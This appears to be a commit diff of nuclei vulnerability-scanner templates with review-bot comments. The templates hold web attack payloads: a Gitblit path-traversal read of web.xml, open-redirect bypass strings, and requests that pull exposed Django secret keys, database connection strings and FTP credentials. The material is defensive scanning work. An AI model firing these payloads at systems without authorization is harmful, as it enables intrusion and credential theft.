- https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md
- https://www.cvedetails.com/cve/CVE-2022-31268
- https://vuldb.com/?id.200500
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-31268
cwe-id: CWE-22
metadata:
shodan-query: http.html:"Gitblit"
verified: "true"
tags: cve,cve2022,lfi,gitblit
requests:
- method: GET
path:
- "{{BaseURL}}/resources//../WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</web-app>"
- "java.sun.com"
- "gitblit.properties"
condition: and
- type: word
part: header
words:
- "application/xml"
- type: status
status:
- 200


@ -0,0 +1,34 @@
id: eventum-panel
info:
name: Eventum Panel Detect
author: princechaddha
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:305412257
tags: panel,eventum
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<title>Login - Eventum</title>'
- 'title="Eventum Issues search"'
condition: or
- type: word
part: body
words:
- 'Database Error:'
- 'There seems to be a problem connecting to the database server specified in your configuration file'
condition: and
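Review bot: The second matcher fires on `Database Error:` plus a generic connection-failure sentence that contains no product name, so a host is reported as an Eventum panel on a database-error page; unless that exact sentence is unique to Eventum (I cannot confirm that from this page) it can tag unrelated applications, and even when it is Eventum the result is not a login panel. Either add an Eventum-specific token to that matcher or state the intent above it with a comment such as `# Eventum installs whose database is unreachable identify themselves through this error page`.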


@ -2,23 +2,38 @@ id: zte-panel
info: info:
name: ZTE Panel name: ZTE Panel
author: github.com/its0x08 author: its0x08,idealphase
severity: info severity: info
description: |
ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.
reference:
- https://www.zte.com.cn/global/
metadata:
verified: true
shodan-query: http.html:"ZTE Corporation"
tags: panel,zte tags: panel,zte
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "ZTE Corporation. All rights reserved. </div>" - "ZTE Corporation. All rights reserved. </div>"
- '<form name="fLogin" id="fLogin" method="post" onsubmit="return false;" action="">' - '<form name="fLogin" id="fLogin" method="post" onsubmit="return false;" action="">'
part: body
condition: and condition: and
- type: word - type: word
part: header
words: words:
- "Mini web server 1.0 ZTE corp 2005." - "Mini web server 1.0 ZTE corp 2005."
part: header
extractors:
- type: regex
part: body
group: 1
regex:
- '<div class="type"><font id="">(.+)<\/font><\/div>'
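Review bot: The new `description` paragraph appears twice back-to-back — the text ending "...across the globe." is immediately repeated — and if that is not a rendering artifact of this page the block scalar holds a duplicated paragraph whose second copy should be dropped. The extractor's `(.+)` is greedy, so if a `<div class="type">` line can contain more than one `<font>` element it captures across them; `(.+?)` is the safer form, though I cannot tell from the hunk whether that layout occurs.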


@ -0,0 +1,33 @@
id: appsettings-file-disclosure
info:
name: Application Setting file disclosure
author: DhiyaneshDK,tess
severity: high
description: |
appsetting.json file discloses the DB connection strings containing sensitive information.
reference:
- https://twitter.com/hacker_/status/1518003548855930882?s=20&t=BVauK0yUjVl5yL7rwy0Eag
metadata:
verified: true
tags: exposure
requests:
- method: GET
path:
- "{{BaseURL}}/appsettings.json"
matchers-condition: and
matchers:
- type: word
words:
- "ConnectionStrings"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
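Review bot: The description names `appsetting.json` while the request path is `/appsettings.json`; fix the description to match the path, e.g. `appsettings.json discloses the DB connection strings containing sensitive information.`. The first matcher omits `part:`, which falls back to the body; the other new exposure templates in this commit (django-secret-key, php-ini) spell out `part: body`, and doing the same here keeps the set consistent.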


@ -0,0 +1,46 @@
id: django-secret-key
info:
name: Django Secret Key Exposure
author: geeknik,DhiyaneshDk
severity: high
reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key
metadata:
verified: true
shodan-query: html:settings.py
tags: django,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/settings.py"
- "{{BaseURL}}/app/settings.py"
- "{{BaseURL}}/django/settings.py"
- "{{BaseURL}}/settings/settings.py"
- "{{BaseURL}}/web/settings/settings.py"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SECRET_KEY ="
- type: word
part: header
words:
- "text/html"
negative: true
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"DJANGO_SECRET_KEY", "(.*)"'
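Review bot: The extractor regex `"DJANGO_SECRET_KEY", "(.*)"` only matches an `os.environ.get("DJANGO_SECRET_KEY", "<fallback>")`-style line, whereas the matcher keys on `SECRET_KEY =`, so for the common literal assignment the template matches but extracts nothing, and when it does extract it returns the hard-coded fallback rather than whatever value the environment supplies. Either align the extractor with the matcher or record the narrower intent above `extractors:` with a comment such as `# extractor only covers the environ.get(..., fallback) form; literal assignments are matched but not extracted`. `reference:` is a bare string here (and in git-mailmap and php-ini) while the other templates in this commit use a list; nuclei accepts both, but one form per commit reads better.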


@ -0,0 +1,29 @@
id: ftpconfig
info:
name: Atom remote-ssh ftpconfig Exposure
author: geeknik,DhiyaneshDK
description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials
severity: high
metadata:
verified: true
shodan-query: html:ftpconfig
tags: atom,ftp,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.ftpconfig"
matchers-condition: and
matchers:
- type: word
words:
- '"protocol":'
- '"host":'
- '"user":'
condition: and
- type: status
status:
- 200


@ -0,0 +1,33 @@
id: git-mailmap
info:
name: Git Mailmap File Disclosure
author: geeknik,DhiyaneshDK
severity: low
reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html
metadata:
verified: true
shodan-query: html:mailmap
tags: config,exposure,git,mailmap
requests:
- method: GET
path:
- "{{BaseURL}}/.mailmap"
matchers-condition: and
matchers:
- type: regex
regex:
- "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])"
- type: word
part: body
words:
- "# Theresa O'Connor:"
negative: true
- type: status
status:
- 200
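Review bot: The regex matcher is an unanchored RFC 5322 address pattern, so any 200 response that happens to contain an e-mail address — including a catch-all HTML page served for `/.mailmap` — satisfies it, and the only guard is the negative word for the man-page sample. Add the `text/html` negative header matcher that the django-secret-key template in this commit already uses so HTML fallbacks are excluded.
```yaml
# … unchanged: regex matcher …
      - type: word
        part: header
        words:
          - "text/html"
        negative: true
# … unchanged: status matcher …
```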


@ -0,0 +1,32 @@
id: php-ini
info:
name: Php.ini File Disclosure
author: geeknik,DhiyaneshDK
severity: low
reference: https://www.php.net/manual/en/configuration.file.php
metadata:
verified: true
shodan-query: php.ini
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/php.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "[PHP]"
- "short_open_tag"
- "safe_mode"
- "expose_php"
condition: and
- type: status
status:
- 200
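Review bot: Requiring `safe_mode` under `condition: and` narrows detection to php.ini files from PHP releases that still shipped that directive (it was removed in PHP 5.4, if I recall correctly), so a leaked php.ini from a current install would be missed even though `[PHP]`, `short_open_tag` and `expose_php` are present. Consider dropping `safe_mode` from the and-group, and add a one-line comment above `words:` stating which php.ini flavours the tokens were verified against.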


@ -11,10 +11,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}//example.com/%2F..' - '{{BaseURL}}//interact.sh/%2F..'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -13,7 +13,7 @@ self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh"
matchers: matchers:
- type: word - type: word


@ -15,7 +15,7 @@ self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- https://fullhunt.io/api/v1/domain/example.com/details - https://fullhunt.io/api/v1/domain/interact.sh/details
headers: headers:
X-API-Key: "{{token}}" X-API-Key: "{{token}}"


@ -14,7 +14,7 @@ self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- https://sslmate.com/api/v2/certs/example.com?expand=current.crt - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt
headers: headers:
Authorization: Bearer {{token}} Authorization: Bearer {{token}}


@ -13,9 +13,9 @@ requests:
- raw: - raw:
- | - |
GET /?{{randstr}}=9 HTTP/1.1 GET /?{{randstr}}=9 HTTP/1.1
X-Forwarded-Prefix: prefix.cache.example.com X-Forwarded-Prefix: prefix.cache.interact.sh
X-Forwarded-Host: host.cache.example.com X-Forwarded-Host: host.cache.interact.sh
X-Forwarded-For: for.cache.example.com X-Forwarded-For: for.cache.interact.sh
- | - |
GET /?{{randstr}}=9 HTTP/1.1 GET /?{{randstr}}=9 HTTP/1.1
@ -24,10 +24,10 @@ requests:
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'contains(body_2, "cache.example.com")' - 'contains(body_2, "cache.interact.sh")'
extractors: extractors:
- type: regex - type: regex
part: response part: response
regex: regex:
- "(prefix|host|for).cache.example.com" - "(prefix|host|for).cache.interact.sh"


@ -15,94 +15,94 @@ requests:
payloads: payloads:
redirect: redirect:
- '%0a/example.com/' - '%0a/interact.sh/'
- '%0d/example.com/' - '%0d/interact.sh/'
- '%00/example.com/' - '%00/interact.sh/'
- '%09/example.com/' - '%09/interact.sh/'
- '%5C%5Cexample.com/%252e%252e%252f' - '%5C%5Cinteract.sh/%252e%252e%252f'
- '%5Cexample.com' - '%5Cinteract.sh'
- '%5cexample.com/%2f%2e%2e' - '%5cinteract.sh/%2f%2e%2e'
- '%5c{{RootURL}}example.com/%2f%2e%2e' - '%5c{{RootURL}}interact.sh/%2f%2e%2e'
- '../example.com' - '../interact.sh'
- '.example.com' - '.interact.sh'
- '/%5cexample.com' - '/%5cinteract.sh'
- '////\;@example.com' - '////\;@interact.sh'
- '////example.com' - '////interact.sh'
- '///example.com' - '///interact.sh'
- '///example.com/%2f%2e%2e' - '///interact.sh/%2f%2e%2e'
- '///example.com@//' - '///interact.sh@//'
- '///{{RootURL}}example.com/%2f%2e%2e' - '///{{RootURL}}interact.sh/%2f%2e%2e'
- '//;@example.com' - '//;@interact.sh'
- '//\/example.com/' - '//\/interact.sh/'
- '//\@example.com' - '//\@interact.sh'
- '//\example.com' - '//\interact.sh'
- '//\texample.com/' - '//\tinteract.sh/'
- '//example.com/%2F..' - '//interact.sh/%2F..'
- '//example.com//' - '//interact.sh//'
- '//example.com@//' - '//interact.sh@//'
- '//example.com\texample.com/' - '//interact.sh\tinteract.sh/'
- '//https://example.com@//' - '//https://interact.sh@//'
- '/<>//example.com' - '/<>//interact.sh'
- '/\/\/example.com/' - '/\/\/interact.sh/'
- '/\/example.com' - '/\/interact.sh'
- '/\example.com' - '/\interact.sh'
- '/example.com' - '/interact.sh'
- '/example.com/%2F..' - '/interact.sh/%2F..'
- '/example.com/' - '/interact.sh/'
- '/example.com/..;/css' - '/interact.sh/..;/css'
- '/https:example.com' - '/https:interact.sh'
- '/{{RootURL}}example.com/' - '/{{RootURL}}interact.sh/'
- '/〱example.com' - '/〱interact.sh'
- '/〵example.com' - '/〵interact.sh'
- '/ゝexample.com' - '/ゝinteract.sh'
- '/ーexample.com' - '/ーinteract.sh'
- '/ーexample.com' - '/ーinteract.sh'
- '<>//example.com' - '<>//interact.sh'
- '@example.com' - '@interact.sh'
- '@https://example.com' - '@https://interact.sh'
- '\/\/example.com/' - '\/\/interact.sh/'
- 'example%E3%80%82com' - 'interact%E3%80%82sh'
- 'example.com' - 'interact.sh'
- 'example.com/' - 'interact.sh/'
- 'example.com//' - 'interact.sh//'
- 'example.com;@' - 'interact.sh;@'
- 'https%3a%2f%2fexample.com%2f' - 'https%3a%2f%2finteract.sh%2f'
- 'https:%0a%0dexample.com' - 'https:%0a%0dinteract.sh'
- 'https://%0a%0dexample.com' - 'https://%0a%0dinteract.sh'
- 'https://%09/example.com' - 'https://%09/interact.sh'
- 'https://%2f%2f.example.com/' - 'https://%2f%2f.interact.sh/'
- 'https://%3F.example.com/' - 'https://%3F.interact.sh/'
- 'https://%5c%5c.example.com/' - 'https://%5c%5c.interact.sh/'
- 'https://%5cexample.com@' - 'https://%5cinteract.sh@'
- 'https://%23.example.com/' - 'https://%23.interact.sh/'
- 'https://.example.com' - 'https://.interact.sh'
- 'https://////example.com' - 'https://////interact.sh'
- 'https:///example.com' - 'https:///interact.sh'
- 'https:///example.com/%2e%2e' - 'https:///interact.sh/%2e%2e'
- 'https:///example.com/%2f%2e%2e' - 'https:///interact.sh/%2f%2e%2e'
- 'https:///example.com@example.com/%2e%2e' - 'https:///interact.sh@interact.sh/%2e%2e'
- 'https:///example.com@example.com/%2f%2e%2e' - 'https:///interact.sh@interact.sh/%2f%2e%2e'
- 'https://:80#@example.com/' - 'https://:80#@interact.sh/'
- 'https://:80?@example.com/' - 'https://:80?@interact.sh/'
- 'https://:@\@example.com' - 'https://:@\@interact.sh'
- 'https://:@example.com\@example.com' - 'https://:@interact.sh\@interact.sh'
- 'https://:@example.com\@WillBeReplaced.com' - 'https://:@interact.sh\@WillBeReplaced.com'
- 'https://;@example.com' - 'https://;@interact.sh'
- 'https://\texample.com/' - 'https://\tinteract.sh/'
- 'https://example.com/example.com' - 'https://interact.sh/interact.sh'
- 'https://example.com/https://example.com/' - 'https://interact.sh/https://interact.sh/'
- 'https://www.\.example.com' - 'https://www.\.interact.sh'
- 'https:/\/\example.com' - 'https:/\/\interact.sh'
- 'https:/\example.com' - 'https:/\interact.sh'
- 'https:/example.com' - 'https:/interact.sh'
- 'https:example.com' - 'https:interact.sh'
- '{{RootURL}}example.com' - '{{RootURL}}interact.sh'
- '〱example.com' - '〱interact.sh'
- '〵example.com' - '〵interact.sh'
- 'ゝexample.com' - 'ゝinteract.sh'
- 'ーexample.com' - 'ーinteract.sh'
- 'ーexample.com' - 'ーinteract.sh'
- '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' - 
'?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh'
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
@ -111,7 +111,7 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status - type: status
status: status:


@ -15,13 +15,13 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com" - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'location == "https://example.com"' - 'location == "https://interact.sh"'
- type: status - type: status
status: status:


@ -1,29 +0,0 @@
id: ibm-websphere-ssrf
info:
name: IBM WebSphere Portal SSRF
author: pdteam
severity: high
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
tags: ibm,ssrf,websphere
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Example Domain</title>"


@ -13,7 +13,7 @@ requests:
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
headers: headers:
l5d-dtab: /svc/* => /$/inet/example.com/443 l5d-dtab: /svc/* => /$/inet/interact.sh/443
matchers-condition: or matchers-condition: or
matchers: matchers:
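Review bot: The new `l5d-dtab` value points at the literal host `interact.sh`, so whatever this header is meant to make the proxy do, the template gets no out-of-band signal that the override was honoured and relies entirely on the response matchers, which are outside this hunk. If the detection is intentionally response-based, a comment above the header would save the next reader from reaching for the `{{interactsh-url}}` placeholder, e.g. `# literal host on purpose: detection is response-based, no OOB callback is evaluated`. With `matchers-condition: or` any single matcher is sufficient, so the matcher list below the hunk is what decides false-positive rate here; I can't assess it from this view.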


@ -12,10 +12,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/" - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
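Review bot: The Location regex on the last line of this hunk ends in `interact\.sh.*$`, which accepts any continuation after the canary host, so a redirect to a host that merely begins with it (a constructed example: `interact.sh.example.net`) would be reported as a hit. The stricter tail this same commit uses in the otobo template, `interact\.sh\/?(\/|[^.].*)?$`, rejects a dot directly after the host; replacing the matcher with `- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'` would make it consistent. The same loose `.*$` tail appears in the bitrix, homeautomation and website/lang sections further down this page. Only the request and matcher block are visible; the rest of the template is outside the hunk.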


@ -1,19 +1,18 @@
id: CVE-2020-22210 id: 74cms-sqli
info: info:
name: 74cms Sql Injection name: 74cms Sql Injection
author: princechaddha author: princechaddha
severity: critical severity: critical
description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-22210 - https://github.com/possib1e/vuln/issues/3
- https://github.com/blindkey/cve_like/issues/11
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2020-22210 cve-id: CVE-2020-22210
cwe-id: CWE-89 cwe-id: CWE-89
tags: cve,cve2020,74cms,sqli tags: 74cms,sqli
requests: requests:
- method: GET - method: GET
@ -27,3 +26,4 @@ requests:
part: body part: body
# Enhanced by mp on 2022/03/02 # Enhanced by mp on 2022/03/02
# Enhanced by ritikchaddha on 2022/05/05
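Review bot: After the rename to `id: 74cms-sqli` the template still carries `cve-id: CVE-2020-22210` under `classification`, while the new `description` (74cms 5.0.1, AjaxPersonalController.class.php), the new `reference` and the dropped `cve`/`cve2020` tags no longer describe that advisory, so anything that keys on `cve-id` will attribute the 5.0.1 issue to a different bug. If the template now covers a non-CVE issue, drop the `cve-id: CVE-2020-22210` line as well; if it still covers CVE-2020-22210, the id, tags and NVD reference should stay and the new reference be added alongside. The `requests` block is cut off at the end of the first hunk, and the second hunk only appends an enhancement comment.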


@ -9,10 +9,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$'


@ -12,25 +12,25 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com' - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header
- type: status - type: status


@ -14,13 +14,13 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=" - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "Location: https://evil.com" - "Location: https://interact.sh"
part: header part: header
- type: status - type: status
